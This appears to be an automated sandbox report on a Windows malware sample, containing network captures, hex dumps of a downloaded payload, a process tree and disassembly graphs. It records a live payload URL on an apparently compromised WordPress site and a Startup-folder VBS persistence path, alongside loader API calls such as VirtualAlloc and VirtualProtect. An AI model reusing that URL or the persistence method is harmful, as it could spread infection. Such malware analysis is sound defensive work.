                                    2025-01-10 21:30:08 UTC16384INData Raw: 65 a6 d4 0e e9 ae 04 7c a9 51 62 71 91 14 a6 c9 07 f6 b1 da 7d b3 10 e0 a8 d9 db 36 14 97 50 f0 c5 eb 5d 2c d6 20 6f 15 99 bf c0 4d 22 d5 9b bf 0a d6 30 c9 ba 20 4c 16 f1 7a ea e8 0b 1d a3 90 44 e8 04 25 e2 e9 4c f6 d3 b0 c6 47 d4 f5 55 a6 c2 bc a3 cc c9 af 32 b3 4d 45 11 c8 d8 68 7c 0b eb be 9b f0 3b 50 51 6d d3 7c c7 00 20 f4 ce a0 45 76 c1 9d 4f a6 e2 f3 12 ce 74 41 56 bc 18 c6 16 c5 8f a8 7d 0f 55 b9 9c 48 c3 60 f8 97 4a 8f 4d d0 97 e1 aa 3d 7f 2e 10 8e 2c f9 a8 b5 61 20 f0 33 8a e1 3f 96 6e fd a1 af b1 9f b7 4a 9e ce 35 71 aa e3 12 28 f9 c3 41 1a a2 49 55 77 92 0b 2b 00 e6 92 4b e7 c0 40 52 63 1c 05 4e 44 b0 9b ef 78 bc 38 8e c4 e3 e8 06 be 6d f5 d3 98 46 35 2a 10 7d 85 cf da f3 e5 dc fa d6 d2 6f 75 81 bc 54 d2 ec 48 54 d3 83 fa 95 99 28 49 77 57 5e
                                    Data Ascii: e|Qbq}6P], oM"0 LzD%LGU2MEh|;PQm| EvOtAV}UH`JM=.,a 3?nJ5q(AIUw+K@RcNDx8mF5*}ouTHT(IwW^


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.12497205.23.51.544435600C:\Users\user\AppData\Roaming\DisplayName.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-10 21:30:30 UTC101OUTGET /wp-includes/Wuuvrl.dat HTTP/1.1
                                    Host: www.new.eventawardsrussia.com
                                    Connection: Keep-Alive
                                    2025-01-10 21:30:30 UTC218INHTTP/1.1 200 OK
                                    Server: nginx/1.26.1
                                    Date: Fri, 10 Jan 2025 21:30:30 GMT
                                    Content-Length: 913928
                                    Connection: close
                                    Last-Modified: Mon, 09 Dec 2024 23:20:36 GMT
                                    ETag: "df208-628de9cada0b4"
                                    Accept-Ranges: bytes
                                    2025-01-10 21:30:30 UTC16166INData Raw: 25 be 36 86 8b 9b ee 63 4c 02 9e ff e2 3a e6 17 2e 6c 19 66 6d 55 5d ec 0c 74 d7 84 39 38 52 d8 0c d3 0d 22 37 b0 97 8b 10 0d 1f 53 9a a5 0f a5 da 30 98 d3 9d 4c cc ce 70 bd 48 02 b6 64 46 b6 7c 6b fe 8d 1b ad e8 33 30 48 72 0e 20 2d c8 8d f7 b9 68 09 53 c7 65 34 28 e7 82 32 8b a3 54 dd 0c be ab 66 90 ff ad 8b 9f 92 69 06 f1 92 fe 57 90 96 fa 82 0e ed f3 88 e8 54 d8 2e c7 51 8a a0 c2 4d 89 7c 87 ba 86 49 1a f7 63 da ab d8 b9 8f 4c 71 a9 ef 50 57 fe 86 a7 c2 f3 82 5c 19 60 9f 4e 48 72 dd 4c ea 05 a3 32 d3 95 94 50 7a c0 95 ee fc be 5d 68 c2 50 94 9c 74 1e cd 1c 6c 01 9c f2 3e 1e c1 1d bb f3 40 5e eb e1 56 3f ad bf 97 13 de 24 c9 75 34 33 b1 ea f9 1c 52 45 fd 04 4d a3 25 e4 87 b2 61 fe c2 66 5f 88 34 21 2d 47 63 1b 76 9f e5 50 e4 b4 62 47 67 6c b9 b6 bc 29
                                    Data Ascii: %6cL:.lfmU]t98R"7S0LpHdF|k30Hr -hSe4(2TfiWT.QM|IcLqPW\`NHrL2Pz]hPtl>@^V?$u43REM%af_4!-GcvPbGgl)
                                    2025-01-10 21:30:30 UTC16384INData Raw: 5a dc 3a f4 33 06 3c 22 4b 1d f5 f5 46 ba ea 1f de 0f 03 7c 4b 50 9b 00 01 d4 bb 95 72 8a 14 ab 65 ee 0a ec 81 e3 39 1c 5e 7f c5 4a fd 01 d6 49 5f d5 8c 50 e6 42 91 33 b0 12 65 3f 76 fa 36 fd 45 86 fa 66 2a cd f5 6f e0 0d 23 69 f4 98 b3 36 80 c7 1f 4f 70 7c c8 86 0d 52 5c 3f c5 d5 24 69 09 0b 32 8a c8 4f d2 e7 e5 db e2 a9 68 b7 a0 84 0b db 38 c7 aa 50 b4 97 50 a8 c2 9e 1b 88 c7 a9 a8 c2 77 76 54 8a 10 22 e1 e4 d4 3f d2 b0 8b 47 d3 8e 1b 78 9c eb 57 b7 9e 77 83 fa c5 da 72 05 a8 25 cc 39 e7 94 0a 7d b7 4a 0e 49 a9 6b bb 80 6e fb 63 4b b9 91 7a 74 49 57 1c d4 f4 4d 81 bc 22 70 70 05 71 43 c3 5d 2d 9f 59 a1 9f 4d c8 1d 28 f8 d4 e3 03 8e c5 56 5d c9 8d 95 31 8d cf a4 b4 f3 07 a9 81 8a 86 46 cb 42 10 2b 18 4a 6b e0 7d 78 d9 28 53 02 f5 83 a8 7d f1 47 9e ea 75
                                    Data Ascii: Z:3<"KF|KPre9^JI_PB3e?v6Ef*o#i6Op|R\?$i2Oh8PPwvT"?GxWwr%9}JIkncKztIWM"ppqC]-YM(V]1FB+Jk}x(S}Gu
                                    2025-01-10 21:30:31 UTC16384INData Raw: 35 2c 85 b5 97 fe 1e dc 27 3c aa 59 2a 2e 4f 8d 5c 53 40 3e fa dc 7a 33 4a 16 be ab bc 21 48 3a be 8c f8 83 2b 0d 43 f2 72 80 77 de 1e 75 dc 60 cb e7 27 3b 15 07 c7 83 7c 6e 86 14 2d d7 0c de 72 a8 e1 12 f9 75 87 35 bd 22 1f 68 98 41 97 7a 53 25 2a 8f 75 d1 51 28 31 ff 71 41 c2 c7 83 de 4d fc da 8e 77 01 9a 79 c2 e8 30 f3 a2 d8 39 23 7d 5a a2 c2 7a d6 f2 05 1f 23 75 f9 51 0b 56 08 cf 15 c8 ad c1 a5 2b 92 80 fe f4 29 ac 7e 0f f0 c3 8e 17 cc e8 b7 4f 97 96 75 1b e6 44 96 51 be f5 96 f7 fc 7f a1 b0 ea f5 f6 2a c1 63 0a c6 cd 56 01 f6 95 c5 ca 09 9c 1b ff f9 ce 2a 62 c5 38 3f 4d 90 d5 7d d6 ca 45 47 f2 ec 15 2c 69 bd 7a e3 5f 1e 20 1f 3a 92 a9 ec 2e 02 b2 e0 e3 e1 f9 34 a6 2e de 0e b8 23 3e 05 7a 72 f6 2a 48 f0 30 e4 fe 12 33 76 22 d5 f3 14 24 73 1d 90 51 d9
                                    Data Ascii: 5,'<Y*.O\S@>z3J!H:+Crwu`';|n-ru5"hAzS%*uQ(1qAMwy09#}Zz#uQV+)~OuDQ*cV*b8?M}EG,iz_ :.4.#>zr*H03v"$sQ
                                    2025-01-10 21:30:31 UTC16384INData Raw: a2 ec 3a a2 63 c7 14 2b 98 a5 53 ce e0 03 5e 26 73 f8 23 a9 d9 eb cd dc e7 a3 9e ad b6 6b 2e 44 36 51 52 3e 8a d7 1e b5 e8 03 26 5f ac 15 ab b0 5f c5 f8 08 2e ca 85 17 74 e7 8d a0 c9 b6 8d 0c 21 30 11 04 ea 9b 6c 45 41 d3 dc 16 9c 8f c6 fc a7 5f 66 53 9e e1 6d fb 26 c7 c8 84 53 4e 99 84 39 f5 d8 ee f6 ec 8f 52 88 44 82 8d 68 ae bc 5f 0b ea 7e e4 12 f2 f3 bd 8b cb 03 97 a6 ea ad 9d 6d 0a e2 3c 80 4c c3 07 60 d2 11 64 ba 82 7d 03 56 cb e8 31 e8 b2 5f 53 f1 70 28 09 8b a1 a2 ea cf 4b 05 37 f9 18 9c c1 b7 8a 93 a6 43 55 5f 7f 8c ca 1d 1b e4 8a 76 81 78 54 da 04 36 b2 69 a7 e6 87 d7 11 74 14 1d dc 20 a8 2d 40 48 d0 c4 4f dc 3e 9c 54 ed 1c 69 b2 86 87 1a 7e ca 0b fb b1 75 52 fb 4c 08 45 a7 66 38 67 86 9b 7f ce 41 18 77 f7 ef 61 1a 5a 38 a1 1d 5a 4e f5 a1 a2 0f
                                    Data Ascii: :c+S^&s#k.D6QR>&__.t!0lEA_fSm&SN9RDh_~m<L`d}V1_Sp(K7CU_vxT6it -@HO>Ti~uRLEf8gAwaZ8ZN
                                    2025-01-10 21:30:31 UTC16384INData Raw: 54 0a f8 1f 48 fe 6b f3 dd e7 8f 97 ac 69 82 98 25 a7 60 05 47 a7 69 50 ee 78 61 d8 9b bf f6 95 f9 93 33 0f 08 1c e0 fe 1e af 08 a2 06 31 5d 67 54 0d cc 8a 81 78 c9 22 48 a7 83 bb 98 ab 21 42 46 1a e7 90 d1 40 92 12 03 31 f2 f8 8c 62 c3 4c 8d 6f b2 8f 08 69 50 c2 dd 27 a0 94 8d 4f 05 8c b7 89 fd 0a b6 30 e6 f7 1e 62 b2 a9 89 47 77 e4 15 40 04 5a c7 be 2e 30 b5 26 65 b5 8b e9 bf f8 37 2e f7 21 bd 02 97 e1 e8 25 31 b3 08 44 77 73 b1 a9 f6 cc e4 d9 1a 58 35 5e 93 00 2c 5b 47 e8 9e 9d 57 8e 0d 53 10 42 7d 0b 7b b0 8c 83 ab e1 fe 9f 09 96 0b 17 85 97 bb 0f cc 17 7d c9 1a df ec 05 78 10 e9 2f a2 76 b9 da 75 e1 81 59 8f 58 51 12 a8 cf 68 d9 36 42 ae c8 d3 ec f4 7a c5 14 4d ca 6b 93 d2 df 8b f5 85 0d b7 f1 99 32 54 52 66 20 6a aa c3 8f df f1 e9 91 93 4c 52 5c 65
                                    Data Ascii: THki%`GiPxa31]gTx"H!BF@1bLoiP'O0bGw@Z.0&e7.!%1DwsX5^,[GWSB}{}x/vuYXQh6BzMk2TRf jLR\e
                                    2025-01-10 21:30:31 UTC16384INData Raw: d4 fd 98 9c 6f 14 d5 fa 47 a7 a9 79 32 ab 55 4f 0c 32 b0 eb 89 b2 b5 1a 17 91 65 3a 6f a9 75 9b 68 d3 bc 19 6b 41 26 b8 f4 0c 98 6a 7c d9 73 91 de 36 89 fa 15 ff 04 90 cf 25 95 33 51 05 9f 70 35 a3 3f 7f a9 a6 13 9b cc 70 2b 08 e1 64 b7 af e4 f9 31 ca 66 d6 c1 c8 b5 4e 43 36 bd af aa da 5c 89 25 07 21 0e a0 1b fa 64 71 52 86 fc 3a 75 de 31 53 ab c6 d2 f7 62 28 31 7c f4 eb 45 a9 15 a6 06 d9 d7 fa 0a e3 28 b2 51 9a 0a 3a f8 63 83 16 9d b1 f0 73 03 91 03 73 f8 bf 0b 62 7f 6e 13 6e 32 c8 a8 e6 bb 66 d2 e5 fd 9a 69 b7 39 ae 94 14 4c 2b 85 bf aa 16 92 f9 8d fc 7f f1 7f 56 d0 19 cb 66 d1 72 f3 50 47 43 b2 10 b2 22 bc ab 6e 38 83 4b c8 15 55 94 e3 c0 5d 86 bc 1e d3 85 18 5d c7 41 86 6a 20 36 d0 81 8d 28 5c 90 58 2b 9d 9c 0a 4c 6c 87 88 51 a8 73 9f e9 be 12 54 c9
                                    Data Ascii: oGy2UO2e:ouhkA&j|s6%3Qp5?p+d1fNC6\%!dqR:u1Sb(1|E(Q:cssbnn2fi9L+VfrPGC"n8KU]]Aj 6(\X+LlQsT
                                    2025-01-10 21:30:31 UTC16384INData Raw: db 36 a0 60 87 5b 95 4f 9d 3e 5a 45 38 aa 44 c7 5a e2 c9 9f a5 8a a0 95 f3 be db b6 6f 69 0c b6 43 67 7e 52 76 29 87 9b 7b d3 82 96 1f 63 ba 1d 3e ba c8 21 e0 19 59 76 ed 22 ab f2 9a c2 89 03 6e 8b 85 73 3f d3 0a cc 9f 4f 53 6e 69 ac 47 ad 9b 36 5b 78 cb 57 66 66 af ca 04 b0 26 ac f0 c0 3f 46 7c 6b d5 a9 79 77 f4 40 8f c4 23 10 b6 23 6e 24 d5 2b 35 95 42 1b fe 40 bf c3 25 b4 89 5a 42 4f 4c d4 75 16 f2 92 73 6e 14 4b 44 e4 e8 3b 46 77 96 4d 58 33 2b f0 45 f6 64 8a a3 64 ec 26 21 72 54 67 18 4e 17 09 06 d2 0e 00 81 dc 7b ca 59 5e 39 17 2e 1a eb 17 25 64 11 8e b9 9a c4 59 00 c0 03 f6 71 87 a9 4b 0c b3 a6 cb 39 67 c6 b8 ef ec 0b 2d 4d fd 48 64 55 35 f3 59 2f e1 7b c6 e1 6f cd c5 b3 b3 8a 31 e3 86 d4 f5 9c 09 91 f2 13 dd dd 95 e7 37 97 ed 7d 15 c3 21 04 14 e4
                                    Data Ascii: 6`[O>ZE8DZoiCg~Rv){c>!Yv"ns?OSniG6[xWff&?F|kyw@##n$+5B@%ZBOLusnKD;FwMX3+Edd&!rTgN{Y^9.%dYqK9g-MHdU5Y/{o17}!
                                    2025-01-10 21:30:31 UTC16384INData Raw: 98 e8 d3 0a c0 da 96 4c 47 36 e8 b0 b9 ff 28 7d b9 6f 70 d4 58 2f 4f 9e e2 dc 17 34 f9 82 36 f5 df 09 2d 80 85 6c 33 80 54 9e 75 d6 0f a6 01 6d c9 4f 26 bd e7 e8 8f 83 cf fd 7b fa f1 80 46 89 80 84 e9 e6 e0 f2 d7 38 fd 46 de c4 19 11 f7 26 f8 89 d6 d9 f4 17 ff 40 d7 2d 19 68 6d a3 17 fd 39 e7 ad aa 02 5b 2d de 18 d4 cd 89 23 e7 7a d4 38 e2 7b 3a fb f7 cd ef 3a 2f fe a1 3a 79 d0 6e 5d e9 21 9c 91 c0 56 26 7a c0 5d e8 b1 1b 44 92 f4 7f d4 5b 40 4d 1f 55 5a 0e b6 e5 a6 a4 f6 d3 2f 9c 4b 28 8f a9 88 01 ae 21 1f b2 38 f2 12 91 be c8 18 24 84 db 08 b2 55 a2 dc 03 9c 51 d8 15 37 44 ec 2c f1 92 1a cb 1a 0c 36 4f 20 f3 00 42 16 07 8d 4a 8b fe bb 3d 00 72 d9 8d 0b ed 31 80 9e d7 ef df bc 53 61 4c 2d 23 b1 e6 91 bc 9c 1d 84 7f 4d bd 91 3a ad 34 74 d6 d4 77 8d 34 89
                                    Data Ascii: LG6(}opX/O46-l3TumO&{F8F&@-hm9[-#z8{::/:yn]!V&z]D[@MUZ/K(!8$UQ7D,6O BJ=r1SaL-#M:4tw4
                                    2025-01-10 21:30:31 UTC16384INData Raw: 61 e3 c7 f4 1e d3 73 f9 58 5b ff 41 68 a1 2e 4f 70 24 f2 be 99 b8 58 7d 97 39 c2 29 a6 a1 e1 a3 3c 1b c8 f3 4b ae 2f 9c e0 50 b2 66 32 20 fe ed f5 85 5b 01 78 e6 e0 28 ec 7b 8c ed 33 83 11 ca 07 48 e5 d8 9b d0 73 33 cd 3d a1 d2 50 b9 aa 18 80 95 83 ea e3 44 c5 e3 15 d5 a7 e5 05 f5 12 a4 7b 5e 98 68 91 01 f4 b3 f5 b6 25 20 69 7d ef 54 92 12 49 2a 78 01 e7 6a c2 da 04 8f 28 6f 9e a5 d0 25 e7 17 8c 3f 62 dc 93 a0 4f 77 10 3f 2c da 22 a4 22 48 d6 a5 cd 0e 07 1a 97 00 56 44 fe c4 38 9c ed d9 5c 5b 59 25 07 ec 14 34 27 b2 24 20 ae 37 30 34 ac 0f 32 ce 0f cb cf 39 e1 ae 56 38 e9 79 ab 64 a0 f6 82 82 0c 63 0c c6 e5 e5 93 84 5e f4 f0 fa 5e c4 6e 47 03 af 1c 51 52 43 de c1 35 3b ae ec 32 0b fb 03 c8 11 2c e3 85 56 f8 b2 0d 3c ea f9 2e c0 f6 45 95 76 ff d5 96 4f 6d
                                    Data Ascii: asX[Ah.Op$X}9)<K/Pf2 [x({3Hs3=PD{^h% i}TI*xj(o%?bOw?,""HVD8\[Y%4'$ 70429V8ydc^^nGQRC5;2,V<.EvOm
                                    2025-01-10 21:30:31 UTC16384INData Raw: 65 a6 d4 0e e9 ae 04 7c a9 51 62 71 91 14 a6 c9 07 f6 b1 da 7d b3 10 e0 a8 d9 db 36 14 97 50 f0 c5 eb 5d 2c d6 20 6f 15 99 bf c0 4d 22 d5 9b bf 0a d6 30 c9 ba 20 4c 16 f1 7a ea e8 0b 1d a3 90 44 e8 04 25 e2 e9 4c f6 d3 b0 c6 47 d4 f5 55 a6 c2 bc a3 cc c9 af 32 b3 4d 45 11 c8 d8 68 7c 0b eb be 9b f0 3b 50 51 6d d3 7c c7 00 20 f4 ce a0 45 76 c1 9d 4f a6 e2 f3 12 ce 74 41 56 bc 18 c6 16 c5 8f a8 7d 0f 55 b9 9c 48 c3 60 f8 97 4a 8f 4d d0 97 e1 aa 3d 7f 2e 10 8e 2c f9 a8 b5 61 20 f0 33 8a e1 3f 96 6e fd a1 af b1 9f b7 4a 9e ce 35 71 aa e3 12 28 f9 c3 41 1a a2 49 55 77 92 0b 2b 00 e6 92 4b e7 c0 40 52 63 1c 05 4e 44 b0 9b ef 78 bc 38 8e c4 e3 e8 06 be 6d f5 d3 98 46 35 2a 10 7d 85 cf da f3 e5 dc fa d6 d2 6f 75 81 bc 54 d2 ec 48 54 d3 83 fa 95 99 28 49 77 57 5e
                                    Data Ascii: e|Qbq}6P], oM"0 LzD%LGU2MEh|;PQm| EvOtAV}UH`JM=.,a 3?nJ5q(AIUw+K@RcNDx8mF5*}ouTHT(IwW^


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:16:30:05
                                    Start date:10/01/2025
                                    Path:C:\Users\user\Desktop\3pwbTZtiDu.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\3pwbTZtiDu.exe"
                                    Imagebase:0x540000
                                    File size:15'360 bytes
                                    MD5 hash:3209478AF7484C36341D0939FB84CB88
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2613644694.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:16:30:19
                                    Start date:10/01/2025
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 2296
                                    Imagebase:0xf0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:16:30:27
                                    Start date:10/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs"
                                    Imagebase:0xbb0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:16:30:28
                                    Start date:10/01/2025
                                    Path:C:\Users\user\AppData\Roaming\DisplayName.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\DisplayName.exe"
                                    Imagebase:0xc0000
                                    File size:15'360 bytes
                                    MD5 hash:3209478AF7484C36341D0939FB84CB88
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2788513573.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 70%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:16:30:42
                                    Start date:10/01/2025
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 2256
                                    Imagebase:0xf0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:13.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:122
                                      Total number of Limit Nodes:5
                                      execution_graph 50364 27b1e18 50365 27b1e32 50364->50365 50366 27b1e42 50365->50366 50371 27b83e3 50365->50371 50376 27bab8b 50365->50376 50381 27b26f7 50365->50381 50385 27b6ef1 50365->50385 50372 27bc3f8 50371->50372 50390 5aa1908 50372->50390 50394 5aa18f9 50372->50394 50373 27bc41c 50377 27babaa 50376->50377 50411 5aa0438 50377->50411 50416 5aa0448 50377->50416 50378 27babcf 50383 5aa0438 2 API calls 50381->50383 50384 5aa0448 2 API calls 50381->50384 50382 27b265d 50383->50382 50384->50382 50386 27b6ef3 50385->50386 50388 5aa0438 2 API calls 50386->50388 50389 5aa0448 2 API calls 50386->50389 50387 27b265d 50388->50387 50389->50387 50391 5aa191d 50390->50391 50398 5aa1948 50391->50398 50395 5aa1908 50394->50395 50397 5aa1948 2 API calls 50395->50397 50396 5aa1935 50396->50373 50397->50396 50400 5aa197f 50398->50400 50399 5aa1935 50399->50373 50403 5aa1a59 50400->50403 50407 5aa1a60 50400->50407 50404 5aa1a60 VirtualAlloc 50403->50404 50406 5aa1b11 50404->50406 50406->50399 50408 5aa1aa4 VirtualAlloc 50407->50408 50410 5aa1b11 50408->50410 50410->50399 50413 5aa0417 50411->50413 50412 5aa052c 50412->50378 50413->50411 50421 5aa0928 50413->50421 50425 5aa0921 50413->50425 50418 5aa0417 50416->50418 50417 5aa052c 50417->50378 50418->50416 50419 5aa0928 VirtualProtect 50418->50419 50420 5aa0921 VirtualProtect 50418->50420 50419->50417 50420->50417 50422 5aa0971 VirtualProtect 50421->50422 50424 5aa09de 50422->50424 50424->50412 50426 5aa0928 VirtualProtect 50425->50426 50428 5aa09de 50426->50428 50428->50412 50454 5c709f1 50455 5c709f9 50454->50455 50459 5cb3040 50455->50459 50463 5cb3030 50455->50463 50456 5c70a3d 50460 5cb3055 50459->50460 50461 5cb306b 50460->50461 50467 5cb3ebf 50460->50467 50461->50456 50464 5cb3035 50463->50464 50465 5cb3ebf 2 API calls 50464->50465 50466 5cb306b 50464->50466 50465->50466 50466->50456 50468 5cb3ec1 50467->50468 50472 5cb85d8 50468->50472 50476 5cb85cc 50468->50476 50469 5cb3ea6 50469->50461 50473 5cb8634 CopyFileA 50472->50473 50475 5cb8765 50473->50475 50477 5cb8634 CopyFileA 50476->50477 50479 5cb8765 50477->50479 50312 5c70540 50313 5c70546 50312->50313 50317 5c6d37a 50313->50317 50322 5c6d388 50313->50322 50314 5c7008f 50318 5c6d325 50317->50318 50319 5c6d382 50317->50319 50318->50314 50326 5c6d4f2 50319->50326 50323 5c6d39d 50322->50323 50325 5c6d4f2 2 API calls 50323->50325 50324 5c6d3b3 50324->50314 50325->50324 50327 5c6d513 50326->50327 50328 5c6d6c7 50327->50328 50331 5c6e1b0 50327->50331 50335 5c6e1b8 50327->50335 50332 5c6e201 VirtualProtect 50331->50332 50334 5c6e26e 50332->50334 50334->50327 50336 5c6e201 VirtualProtect 50335->50336 50338 5c6e26e 50336->50338 50338->50327 50339 5c70a4b 50340 5c70a55 50339->50340 50344 5c691e2 50340->50344 50348 5c691e8 50340->50348 50345 5c691fd 50344->50345 50352 5c69316 50345->50352 50349 5c691fd 50348->50349 50351 5c69316 2 API calls 50349->50351 50350 5c69213 50351->50350 50353 5c692fd 50352->50353 50353->50352 50356 5c6d0b0 50353->50356 50360 5c6d0aa 50353->50360 50357 5c6d0f4 SleepEx 50356->50357 50359 5c6d154 50357->50359 50359->50353 50361 5c6d0f4 SleepEx 50360->50361 50363 5c6d154 50361->50363 50363->50353 50429 25dd030 50430 25dd048 50429->50430 50431 25dd0a3 50430->50431 50434 5aa0fb0 50430->50434 50439 5aa0fa4 50430->50439 50435 5aa1009 50434->50435 50444 5aa14ff 50435->50444 50449 5aa1510 50435->50449 50436 5aa103e 50436->50436 50440 5aa1009 50439->50440 50442 5aa14ff 2 API calls 50440->50442 50443 5aa1510 2 API calls 50440->50443 50441 5aa103e 50441->50441 50442->50441 50443->50441 50445 5aa1510 50444->50445 50446 5aa0448 2 API calls 50445->50446 50448 5aa16d3 50445->50448 50447 5aa16c4 50446->50447 50447->50436 50448->50436 50450 5aa153d 50449->50450 50451 5aa0448 2 API calls 50450->50451 50453 5aa16d3 50450->50453 50452 5aa16c4 50451->50452 50452->50436 50453->50436

                                      Executed Functions

                                      Function 05AA743F Relevance: 2.6, Strings: 1, Instructions: 1337COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 5aa743f-5aa747e 1 5aa7480 0->1 2 5aa7485-5aa75a7 0->2 1->2 6 5aa75cb-5aa75d7 2->6 7 5aa75a9-5aa75bf 2->7 8 5aa75d9 6->8 9 5aa75de-5aa75e3 6->9 284 5aa75c5 call 5aaa3e8 7->284 285 5aa75c5 call 5aaa3d9 7->285 8->9 10 5aa761b-5aa7664 9->10 11 5aa75e5-5aa75f1 9->11 21 5aa766b-5aa7930 10->21 22 5aa7666 10->22 13 5aa75f8-5aa7616 11->13 14 5aa75f3 11->14 15 5aa8d7f-5aa8d85 13->15 14->13 17 5aa8db0 15->17 18 5aa8d87-5aa8da7 15->18 18->17 47 5aa8360-5aa836c 21->47 22->21 48 5aa8372-5aa83aa 47->48 49 5aa7935-5aa7941 47->49 57 5aa8484-5aa848a 48->57 50 5aa7948-5aa7a6d 49->50 51 5aa7943 49->51 86 5aa7a6f-5aa7aa7 50->86 87 5aa7aad-5aa7b36 50->87 51->50 59 5aa83af-5aa842c 57->59 60 5aa8490-5aa84c8 57->60 76 5aa842e-5aa8432 59->76 77 5aa845f-5aa8481 59->77 70 5aa8826-5aa882c 60->70 72 5aa84cd-5aa86cf 70->72 73 5aa8832-5aa887a 70->73 167 5aa876e-5aa8772 72->167 168 5aa86d5-5aa8769 72->168 83 5aa887c-5aa88ef 73->83 84 5aa88f5-5aa8940 73->84 76->77 78 5aa8434-5aa845c 76->78 77->57 78->77 83->84 106 5aa8d49-5aa8d4f 84->106 86->87 112 5aa7b38-5aa7b40 87->112 113 5aa7b45-5aa7bc9 87->113 108 5aa8945-5aa8955 106->108 109 5aa8d55-5aa8d7d 106->109 118 5aa8961-5aa89c7 108->118 109->15 116 5aa8351-5aa835d 112->116 148 5aa7bcb-5aa7bd3 113->148 149 5aa7bd8-5aa7c5c 113->149 116->47 127 5aa89c9-5aa89e4 118->127 128 5aa89ef-5aa89fb 118->128 127->128 129 5aa89fd 128->129 130 5aa8a02-5aa8a0e 128->130 129->130 134 5aa8a10-5aa8a1c 130->134 135 5aa8a21-5aa8a30 130->135 136 5aa8d30-5aa8d46 134->136 137 5aa8a39-5aa8d11 135->137 138 5aa8a32 135->138 136->106 171 5aa8d1c-5aa8d28 137->171 138->137 140 5aa8b2a-5aa8b93 138->140 141 5aa8b98-5aa8c01 138->141 142 5aa8a3f-5aa8aa8 138->142 143 5aa8aad-5aa8b25 138->143 144 5aa8c06-5aa8c6e 138->144 140->171 141->171 142->171 143->171 178 5aa8ce2-5aa8ce8 144->178 148->116 192 5aa7c6b-5aa7cef 149->192 193 5aa7c5e-5aa7c66 149->193 174 5aa87cf-5aa880c 167->174 175 5aa8774-5aa87cd 167->175 190 5aa880d-5aa8823 168->190 171->136 174->190 175->190 183 5aa8cea-5aa8cf4 178->183 184 5aa8c70-5aa8cce 178->184 183->171 197 5aa8cd0 184->197 198 5aa8cd5-5aa8cdf 184->198 190->70 205 5aa7cfe-5aa7d82 192->205 206 5aa7cf1-5aa7cf9 192->206 193->116 197->198 198->178 212 5aa7d91-5aa7e15 205->212 213 5aa7d84-5aa7d8c 205->213 206->116 219 5aa7e17-5aa7e1f 212->219 220 5aa7e24-5aa7ea8 212->220 213->116 219->116 226 5aa7eaa-5aa7eb2 220->226 227 5aa7eb7-5aa7f3b 220->227 226->116 233 5aa7f4a-5aa7fce 227->233 234 5aa7f3d-5aa7f45 227->234 240 5aa7fdd-5aa8061 233->240 241 5aa7fd0-5aa7fd8 233->241 234->116 247 5aa8063-5aa806b 240->247 248 5aa8070-5aa80f4 240->248 241->116 247->116 254 5aa8103-5aa8187 248->254 255 5aa80f6-5aa80fe 248->255 261 5aa8189-5aa8191 254->261 262 5aa8196-5aa821a 254->262 255->116 261->116 268 5aa8229-5aa82ad 262->268 269 5aa821c-5aa8224 262->269 275 5aa82af-5aa82b7 268->275 